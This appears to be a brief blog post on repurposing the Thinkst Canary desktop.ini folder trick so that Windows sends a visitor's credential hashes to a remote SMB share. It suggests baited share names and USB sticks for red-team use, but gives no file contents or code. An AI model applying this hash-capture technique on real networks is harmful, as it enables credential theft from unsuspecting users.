Recently had a *duh* moment while playing with the ‘opened folder’ canary technique used by – a Thinkst* project

One of the Canary triggers works by taking advantage of the way Microsoft Windows presents folders to it’s users, this happens by checking for a ==hidden== desktop.ini file that will point the OS to folder view preferences.

Canary works by directing the preferences to a remote server, when that request comes in, we know the folder has been entered… very sneaky! ( I didn’t know about this technique until I was exploring the available payloads – check them out

So I figured, if we point it to a remote location with SMB authentication on it, we know that windows will automatically send it’s current user’s credentials to the location, I’ll get hashes!


If you are ever on a RedTeam and you have access to a shared folder plant one in there will need to make a share read-only for the desktop.ini to persist with a name like PeopleGettingSacked or Movies or CEO Holiday Pics … whatever, you know better than me…

Additionally, if you put the desktop.ini flat on a USB stick as soon as the pen is mounted (unless auto-run is disabled, it will open up the folder automatically (actioning the attack)

I bet this is already being used out there ! … very sneaky/powerful, I had to share … in fact, I can’t help thinking this might be a very well known thing and I’m out of the loop -_-

I think there is some caching of the desktop.ini too (at least with Windows 10, as when I ejected my evil USB I could still see incoming requests from my machine. – will follow up with that.

An in-depth look into options when writing a desktop.ini file, possibly more opportunities for trouble?

Attacker & User view :